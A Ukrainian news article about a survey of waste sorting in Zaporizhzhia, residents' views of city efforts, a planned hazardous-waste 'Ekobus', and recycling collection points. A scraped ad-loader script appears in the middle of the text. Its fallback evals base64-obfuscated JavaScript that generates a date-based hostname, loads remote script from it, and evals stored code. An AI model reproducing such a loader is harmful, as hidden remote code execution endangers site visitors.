Стало відомо, скільки запоріжців сортують сміття й де працюють пункти прийому вторсировини

У Запоріжжі постійно сортують сміття 16% мешканців. За умови встановлення баків у дворах готові сортувати ще 44%. Частина городян навіть готова до збільшення тарифу на обслуговування відходів, якщо це дозволить створити кращі умови для роздільного збору.

Такі результати отримала громадська організація «Запоріжжя без сміття», яка замовила «Дослідження ситуації у сфері поводження з відходами у м. Запоріжжя» за фінансування ЕС та National Endowment for Democracy.

Нарешті ми знаємо певну цифру, 16 відсотків людей вже сортує! Як на мене, в тих умовах, що є, це дуже добре. При цьому, щоб до цього процесу доєдналось більш широке коло людей не вистачає інфраструктури, як от баки у дворах тощо, так і популяризації роздільного збору. Також ми знайшли 50 працюючих пунктів прийому в місті й створили табличку, яка допоможе тим, хто не знав, куди відносити відсортоване, і не хоче чекати поки з’являться баки поряд з домом. Мені здається увага до теми екозвичок і свідомого споживання за останні роки точно зросла, — розповів співзасновник ГО Іван Калоша.

Дослідження показало, що більшість громадян вважають проблему відходів актуальною навіть під час війни, вказуючи що це впливає на здоров’я людей і тварин та стан довкілля в цілому.

Як запоріжці оцінили діяльність влади?

Близько 70% мешканців вважають що “влада робить недостатньо” або “нічого не роблять”. 21% не знає про діяльність влади, ще 8% відповіли “роблять достатньо”.

Треба розуміти, що зараз влада й бізнес не будуть витрачати ресурси на інфраструктуру , тож варто приділити увагу плануванню, розробити стратегію того, що ми будемо робити після перемоги, — додав Іван Калоша.

Наразі владою в місті встановлено контейнери для роздільного збору побутових відходів в 3-х дворах і контейнери для збору будівельного сміття. (десятки шт. по всьому місту). var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Заплановані проєкти:

● Запустити “Екобус” — спеціальний автомобіль, який буде по графіку стояти в різних районах міста і приймати від мешканців небезпечні відходи у складі побутових (ртутні лампи, термометри, тощо).
● Пілотні проєкти з сортування у співпраці з громадськими організаціями

Приємно було дізнатись, що в нас є просунуті комунальники які планують цікаві проєкти, нпариклад проєкт «Екобус».
Ідея в тому, щоб спеціальне авто по графіку пересувалось районами і приймало небезпечні відходи у населення, це батарейки, лампочки, термометри тощо. Екобус по ціні/якості найкращє рішення по збору подібних відходів. Поки проєкт не профінансований, — розповів Іван.

Отримані результати ГО планує передати в міську раду та комунальникам, щоб вони могли використати їх. Також наступного року організація планує продовжити просувати реформу в місті, ці дані допоможуть розробити дорожню карту по розвитку системи управління відходами в місті.

Де у Запоріжжі працюють зараз пункти прийому вторсировини?

В рамках дослідження було також зроблено перепис пунктів з прийому вторсировину, яка продовжують працювати. Є список для кожного району. Ознакомитися з ним можно за посиланням.

Як висновок і рекомендація для всіх — є велика потреба пріоретизувати проблему. Якщо містяни частіше будуть писати email в мерію, чи напишуть у Фейсбуці своєму депутату, чи навіть залишать заявку на сайті 15-80 про те, що в них у дворі нема баків для сортування, спитають чому так, тоді баки у дворах з’являться швидше, — додав Іван Калоша. (adsbygoogle = window.adsbygoogle || []).push({});

Як у Запоріжжі дарують друге життя пластику: інтерв’ю зі співзасновником майстерні PlasticOn Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/stalo-vidomo-skilki-zaporizhtsiv-sortuyut-smittya-j-de-pratsyuyut-punkti-prijomu-vtorsirovini/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top